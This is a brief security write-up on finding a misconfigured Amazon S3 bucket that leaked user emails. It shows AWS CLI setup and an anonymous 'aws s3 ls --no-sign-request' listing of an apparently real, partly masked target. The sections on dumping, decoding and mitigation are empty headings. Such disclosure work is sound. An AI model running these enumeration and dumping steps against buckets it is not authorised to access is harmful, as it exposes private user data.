Exploiting S3 bucket misconfiguration to dump users emails
This page has writeup about how misconfigured Amazon S3 bucket was found leaking several users email and other docs in public domain.
Checking If bucket is misconfigured
Installing AWS cli
$ sudo apt install python3 python3-pip -y
$ pip3 install awscliVerify Installation
$ aws --version
aws-cli/1.27.45 Python/3.10.6 Linux/5.15.0-57-generic botocore/1.29.45Checking if bucket is accessible anonymously
https://bucket-name.s3.amazonaws.com/$ aws s3 ls s3://bucket-name --no-sign-request
PRE admin/
PRE bi/
PRE blog/
PRE campanhas/
PRE css/
PRE data/
PRE escolas/
PRE fonts/
PRE front-assets/
PRE front-cache/
PRE img/
PRE lib/
PRE lps/
PRE marketing/
PRE XXXXXXX-tech/
PRE ms-qrcode/
PRE outros/
PRE parcerias/
PRE plugins/
PRE pwa/
PRE redirects/
PRE removals/
PRE sales/
PRE study-plans/
PRE styles/
PRE tech-blog/
PRE tutoriais/
PRE uploads/
PRE video/
PRE wiris-service/
2019-10-29 02:36:17 404 favicon.ico
2022-12-01 00:38:53 96 robots.txt
2022-11-02 20:44:17 59383 sitemap.xmlEnumerating Through Directories and Dumping File names


Extracting User Info from Dumped Data


Decoding base64 Data Line by Line



How to mitigate issue and develop better applications
PreviousSecurity Analysis of the Indian Government's Student Assessment PlatformNextGetting Shell Access to ADB Exposed Smart Devices π²πΊβ
Last updated